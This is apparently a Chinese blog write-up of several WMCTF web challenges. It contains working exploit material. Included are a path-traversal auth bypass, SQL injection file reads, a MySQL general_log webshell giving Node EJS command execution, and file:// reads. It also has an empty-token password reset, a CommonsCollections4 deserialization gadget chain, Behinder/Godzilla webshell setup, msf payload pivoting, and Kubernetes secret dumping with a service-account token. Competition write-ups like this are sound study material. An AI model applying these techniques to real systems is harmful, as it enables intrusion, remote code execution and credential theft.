好久没写博客了。ORZ

AnyFileRead

存在解析差异问题

参考 https://www.cuijianxiong.top/%E6%9C%AA%E5%88%86%E7%B1%BB/2019/05/20/e8b7afe5be84e5b7aee5bc82e58c96e58fafe883bde5bc95e58f91e4b880e4ba9be5ae89e585a8e997aee9a298e7bbad/

/admin/../ 绕过

GET /admin/../flag HTTP/1.1
Host: 43.132.224.5:8888
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

WMCTF{bypass_auth_is_so_Exciting}

ezblog

目标要rce

1280X1280

/post/:id/edit可以注入,有--secure-file-priv权限

from requests import get
from urllib import parse
from re import search
proxies = {
    "http": None,
    "https": None
}

HOST = 'http://5bf11e7b-8550-4e62-a3f6-8b0f86c36a35.wmctf.wm-team.cn'

ROUTE = "/post/{}/edit".format(parse.quote('0 union select 666, 666, load_file(\'/etc/passwd\')').replace('/', '%2F'))

print(ROUTE)

r = get(HOST+ROUTE, proxies=proxies, allow_redirects=False)

print(r.status_code)

# print(r.content)

s = search(r'{.*}', r.text)

if s:
    print(s.group(0))

读pin码

/home/ezblog/.pm2/logs/main-out.log

有pin在/home/ezblog/views/ 下写个满足条件的文件,然后 /api/debugger/template/test 路由渲染就行,但尝试发下存在权限问题,那重启容器,直接往 /home/ezblog/views/index.ejs 里写即可

# -*- encoding:utf-8 -*-

import requests

session = requests.session()

proxies = {
    "http": "http://127.0.0.1:8084",
    "https": "http://127.0.0.1:8084"
}
url = 'http://69e1df39-c6c8-4f77-8485-2a35297faefb.wmctf.wm-team.cn'
# url = 'http://localhost:3000'
authorization = "d0ae1a1c-e44e-448e-ba4c-f91cc903a317"


def execute_sql(sql):
    burp0_url = url + "/api/debugger/sql/execute"
    burp0_headers = {"Authorization": authorization}
    burp0_data = {"code": sql}
    r = session.post(burp0_url, headers=burp0_headers, data=burp0_data, proxies=proxies)
    print(r.json()["data"])


def main():
    execute_sql("show variables like \"%general_log%\";")
    execute_sql("create database mysql;")
    execute_sql("set global general_log_file = '/home/ezblog/views/index.ejs';")
    execute_sql("""CREATE TABLE mysql.general_log(
event_time TIMESTAMP(6) NOT NULL DEFAULT CURRENT_TIMESTAMP(6),
user_host mediumtext NOT NULL,
thread_id int(11) NOT NULL,
server_id int(10) unsigned NOT NULL,
command_type varchar(64) NOT NULL,
argument mediumtext NOT NULL
) ENGINE=CSV DEFAULT CHARSET=utf8 COMMENT='General log';""")
    execute_sql("SET GLOBAL log_output = 'FILE,TABLE';")
    execute_sql("set global general_log =1;")
    execute_sql("""select "<%=global.process.mainModule.constructor._load('child_process').execSync('/readflag').toString();%>";""")
    execute_sql("set global general_log =0;")


if __name__ == '__main__':
    main()

ez_java_again

看注释有个接口

/Imagefile?url1=upload/favicon.ico

访问说必须有java字符串且不能有flag字符串

7a863ebc-ac15-44e6-9ee0-0f8ec7d457df

可以任意文件读

/Imagefile?url1=file:///etc/passwd%23java
/Imagefile?url1=file:///proc/1/cmdline%23java
/Imagefile?url1=file:///%23java

可以列出任意目录

a6dee249-a87a-4d18-917a-b74f69cbc40e

但读的class文件反编译不了

结果非预期了

file协议么,直接双url编码绕

c2fa29d3-d850-4b62-a336-0f6603184045

你的权限放着我来

存在任意用户密码重置

token置为空即可

POST /api/change HTTP/1.1
Host: 28ab03e6-9b8e-42b6-be9e-2267ba7891b7.wmctf.wm-team.cn
Content-Length: 72
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://28ab03e6-9b8e-42b6-be9e-2267ba7891b7.wmctf.wm-team.cn
Referer: http://28ab03e6-9b8e-42b6-be9e-2267ba7891b7.wmctf.wm-team.cn/change
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

newPassword=123456&confirmPassword=123456&token=&email=alice@example.com

6d04b858-4285-4cb7-a7db-0f5fe9f5e524

重置 jom@roomke.com 的密码即可获得flag

098f6f47-0d30-4718-abd2-e159240b7223

flag{test_flag}

ez_challenge

有 commons-collections4-4.0 的依赖,直接打 CC4 的链子

生成payload

package com.example.exp;

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.*;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;
import java.util.PriorityQueue;

public class ExpFin {

    public static void main(String[] args) throws Exception {

        ClassPool pool = ClassPool.getDefault();
        //内存马
        byte[] bytes = Repository.lookupClass(dawd.class).getBytes();
        Templates templatesImpl = new TemplatesImpl();
        setFieldValue(templatesImpl, "_bytecodes", new byte[][]{bytes});
        setFieldValue(templatesImpl, "_name", "aaaa");
        setFieldValue(templatesImpl, "_tfactory", null);
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templatesImpl})
        };
        ChainedTransformer chain = new ChainedTransformer(transformers);
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templatesImpl});


        TransformingComparator transformingComparator = new TransformingComparator(instantiateTransformer);
        PriorityQueue priorityQueue = new PriorityQueue(2,transformingComparator);
        Field sizeField = PriorityQueue.class.getDeclaredField("size");
        sizeField.setAccessible(true);
        sizeField.set(priorityQueue,2);

        Field queueField = PriorityQueue.class.getDeclaredField("queue");
        queueField.setAccessible(true);
        queueField.set(priorityQueue,new Object[]{TrAXFilter.class,"bar"});

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(barr);
        objectOutputStream.writeObject(priorityQueue);
        objectOutputStream.close();
        String res = Base64.getEncoder().encodeToString(barr.toByteArray());
        System.out.println(res);
    }
    private static void setFieldValue(Object obj, String field, Object arg) throws Exception{
        Field f = obj.getClass().getDeclaredField(field);
        f.setAccessible(true);
        f.set(obj, arg);
    }
}

写冰蝎马脚本

import requests

burp0_url = "http://119.45.178.147:30000/"
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "Origin": "http://119.45.178.147:30000", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://119.45.178.147:30000/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
burp0_data = {"data": ""}
requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
密码: Bfzwcmbggsdytqtff
地址: /*
请求头: User-Agent: Rechjn
脚本类型: JSP

写哥斯拉马脚本

import requests

burp0_url = "http://119.45.178.147:30000/"
burp0_cookies = {"JSESSIONID": "91540884E76F00EB1BF1A5AAD6B0B504"}
burp0_headers = {"Pragma": "no-cache", "Cache-Control": "no-cache", "Upgrade-Insecure-Requests": "1", "Origin": "http://119.45.178.147:30000", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7", "Referer": "http://119.45.178.147:30000/shellAacw125", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
burp0_data = {"data": ""}
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)
加密器: JAVA_AES_BASE64
地址: /shellAacw125
密码: Hcreljak
密钥: Vazwoxyqvohfnbgcwq
请求头: Agent:aaa

后面要内网渗透

没法直接执行命令

用哥斯拉马上传msf马并给可执行权限

630bc478-09a4-4ec1-b16a-8de526322ec6

执行上线msf

f7665559-87ef-4fa8-8a50-a0de37fb1f70

02e37f29-5ed1-4968-a958-7bab8dc7d23a

然后同样的方法挂个nps代理,用Proxifier连上访问内网

从环境变量里能看出有k3s服务,还有个CHECK_SERVICE

2e8be318-e52e-4075-98b7-1a6e6f0c3082

题目源码有个内网地址

00711bf6-4ecd-49b5-8f7f-0c05a56f2ab0

viper做端口转发

b9110caf-c09b-4d25-a70e-85194b5d446b

从给的jar包里的lib.so里拿到token

export KUBE="eyJhbGciOiJSUzI1NiIsImtpZCI6IlZvTVB3eDlfNm0wSzljbnhXRUNZU3JWa1VQRjY3Z05xaTRKU2xwUzBZNXcifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImN0Zi1zZXJ2aWNlYWNjb3VudC1zZWNyZXQiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiY3RmLXNlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiYjEwNWQ5ODctZmQ1Zi00MjZiLTgxODgtOWI3MWNjZTkwYmRhIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6Y3RmLXNlcnZpY2VhY2NvdW50In0.DAaw3fHoGdY8Kl4BHnGeuQaAHJQpLdbB-jsatlLVfJM60N6Ftx0TyXlGDCsgm2e0u25xnWudQqZeneu1H1EaC0QQDzliPjG5dVhbXYIciM3dOyb8cap5wy5bPAgsAE1wPs_ZxAT6r7XQjWfYkqY6waI6R4_Hdrb98Vzwo4O6EYqNQAX8lVlGtAoIbkZ7U72z-zDR6rf_IHetdRs2JYpzG9kScbZLkWGHelY18dCXZHW_FfKqw1yh9zLUf8mh3PwXIeruUOp2oznVazT-qVnxaMOhLKF-4zqEXPbQVgoZh8mT6DNXj5GCBDex4_Uptj-dYJtMzSNC8qyenAeb3tg3Sg"
kubectl --token=$KUBE --server=https://xxx.xxx.xx.xxx:6443 --insecure-skip-tls-verify=true auth can-i --list -n default

39db7129-333f-481a-b2fc-6d5dbb2fa758

kubectl --token=$KUBE --server=https://xxx.xxx.xx.xxx:6443 --insecure-skip-tls-verify=true get secrets -o yaml -n default

得到

apiVersion: v1
items:
- apiVersion: v1
  data:
    password: NWU5ZDgxODktNWMxNi00NTg3LTkyNjAtNGU2YjBjODZmMWVi
    username: a2V5
  kind: Secret
  metadata:
    annotations:
      kubectl.kubernetes.io/last-applied-configuration: |
        {"apiVersion":"v1","data":{"password":"NWU5ZDgxODktNWMxNi00NTg3LTkyNjAtNGU2YjBjODZmMWVi","username":"a2V5"},"kind":"Secret","metadata":{"annotations":{},"name":"key-secret","namespace":"default"},"type":"Opaque"}
    creationTimestamp: "2023-08-18T19:01:04Z"
    managedFields:
    - apiVersion: v1
      fieldsType: FieldsV1
      fieldsV1:
        f:data:
          .: {}
          f:password: {}
          f:username: {}
        f:metadata:
          f:annotations:
            .: {}
            f:kubectl.kubernetes.io/last-applied-configuration: {}
        f:type: {}
      manager: kubectl-client-side-apply
      operation: Update
      time: "2023-08-18T19:01:04Z"
    name: key-secret
    namespace: default
    resourceVersion: "31990"
    uid: 41eca5bb-3afb-49cd-86ef-9b0e482929d2
  type: Opaque
- apiVersion: v1
  data:
    ca.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUJkekNDQVIyZ0F3SUJBZ0lCQURBS0JnZ3Foa2pPUFFRREFqQWpNU0V3SHdZRFZRUUREQmhyTTNNdGMyVnkKZG1WeUxXTmhRREUyT1RJek5EWTFNamd3SGhjTk1qTXdPREU0TURneE5USTRXaGNOTXpNd09ERTFNRGd4TlRJNApXakFqTVNFd0h3WURWUVFEREJock0zTXRjMlZ5ZG1WeUxXTmhRREUyT1RJek5EWTFNamd3V1RBVEJnY3Foa2pPClBRSUJCZ2dxaGtqT1BRTUJCd05DQUFTbWZBdCtJTDdTSEdTT0VCQjB6djBhZThhOHBZaVVRempQWG5HUWt6SXoKQnJvdmNTK0s4c1o2NjRwaExBR2IzMmdrV1RndzdVSlArL3IyUUJzekV5Q09vMEl3UURBT0JnTlZIUThCQWY4RQpCQU1DQXFRd0R3WURWUjBUQVFIL0JBVXdBd0VCL3pBZEJnTlZIUTRFRmdRVXMvZDRrbytkemtCV0h6cVdSY3FCCnhMMkVaaHd3Q2dZSUtvWkl6ajBFQXdJRFNBQXdSUUlnTS91NHFIcU93Z2drenhuejV1cG80dnlJSzQvQTBDcWcKMGVoTGxKRUQwNG9DSVFDdXNLcGVncm5IKy9IeWxYSXVMV3liZGNXbjZZMTlXOXR2MXdSUktSNDBzdz09Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K
    namespace: ZGVmYXVsdA==
    token: ZXlKaGJHY2lPaUpTVXpJMU5pSXNJbXRwWkNJNklsWnZUVkIzZURsZk5tMHdTemxqYm5oWFJVTlpVM0pXYTFWUVJqWTNaMDV4YVRSS1UyeHdVekJaTlhjaWZRLmV5SnBjM01pT2lKcmRXSmxjbTVsZEdWekwzTmxjblpwWTJWaFkyTnZkVzUwSWl3aWEzVmlaWEp1WlhSbGN5NXBieTl6WlhKMmFXTmxZV05qYjNWdWRDOXVZVzFsYzNCaFkyVWlPaUprWldaaGRXeDBJaXdpYTNWaVpYSnVaWFJsY3k1cGJ5OXpaWEoyYVdObFlXTmpiM1Z1ZEM5elpXTnlaWFF1Ym1GdFpTSTZJbU4wWmkxelpYSjJhV05sWVdOamIzVnVkQzF6WldOeVpYUWlMQ0pyZFdKbGNtNWxkR1Z6TG1sdkwzTmxjblpwWTJWaFkyTnZkVzUwTDNObGNuWnBZMlV0WVdOamIzVnVkQzV1WVcxbElqb2lZM1JtTFhObGNuWnBZMlZoWTJOdmRXNTBJaXdpYTNWaVpYSnVaWFJsY3k1cGJ5OXpaWEoyYVdObFlXTmpiM1Z1ZEM5elpYSjJhV05sTFdGalkyOTFiblF1ZFdsa0lqb2lZakV3TldRNU9EY3RabVExWmkwME1qWmlMVGd4T0RndE9XSTNNV05qWlRrd1ltUmhJaXdpYzNWaUlqb2ljM2x6ZEdWdE9uTmxjblpwWTJWaFkyTnZkVzUwT21SbFptRjFiSFE2WTNSbUxYTmxjblpwWTJWaFkyTnZkVzUwSW4wLkRBYXczZkhvR2RZOEtsNEJIbkdldVFhQUhKUXBMZGJCLWpzYXRsTFZmSk02ME42RnR4MFR5WGxHRENzZ20yZTB1MjV4bld1ZFFxWmVuZXUxSDFFYUMwUVFEemxpUGpHNWRWaGJYWUljaU0zZE95YjhjYXA1d3k1YlBBZ3NBRTF3UHNfWnhBVDZyN1hRaldmWWtxWTZ3YUk2UjRfSGRyYjk4Vnp3bzRPNkVZcU5RQVg4bFZsR3RBb0lia1o3VTcyei16RFI2cmZfSUhldGRSczJKWXB6RzlrU2NiWkxrV0dIZWxZMThkQ1haSFdfRmZLcXcxeWg5ekxVZjhtaDNQd1hJZXJ1VU9wMm96blZhelQtcVZueGFNT2hMS0YtNHpxRVhQYlFWZ29aaDhtVDZETlhqNUdDQkRleDRfVXB0ai1kWUp0TXpTTkM4cXllbkFlYjN0ZzNTZw==
  kind: Secret
  metadata:
    annotations:
      kubernetes.io/service-account.name: ctf-serviceaccount
      kubernetes.io/service-account.uid: b105d987-fd5f-426b-8188-9b71cce90bda
    creationTimestamp: "2023-08-18T13:22:29Z"
    labels:
      kubernetes.io/legacy-token-last-used: "2023-08-20"
    managedFields:
    - apiVersion: v1
      fieldsType: FieldsV1
      fieldsV1:
        f:metadata:
          f:annotations:
            .: {}
            f:kubernetes.io/service-account.name: {}
        f:type: {}
      manager: kubectl-create
      operation: Update
      time: "2023-08-18T13:22:29Z"
    - apiVersion: v1
      fieldsType: FieldsV1
      fieldsV1:
        f:data:
          .: {}
          f:ca.crt: {}
          f:namespace: {}
          f:token: {}
        f:metadata:
          f:annotations:
            f:kubernetes.io/service-account.uid: {}
          f:labels:
            .: {}
            f:kubernetes.io/legacy-token-last-used: {}
      manager: k3s
      operation: Update
      time: "2023-08-20T06:36:29Z"
    name: ctf-serviceaccount-secret
    namespace: default
    resourceVersion: "140777"
    uid: bf517b49-e11d-42da-879c-df84513ce55d
  type: kubernetes.io/service-account-token
kind: List
metadata:
  resourceVersion: ""
  selfLink: ""

上面password进行base64解码得到key 5e9d8189-5c16-4587-9260-4e6b0c86f1eb

访问内网check_service执行命令

b9af5988-c5a4-40e7-882d-8bac5c78b726

反弹个shell然后执行 /readflag

7ea898a5-3a2c-4b2b-ab07-1eecd72451ee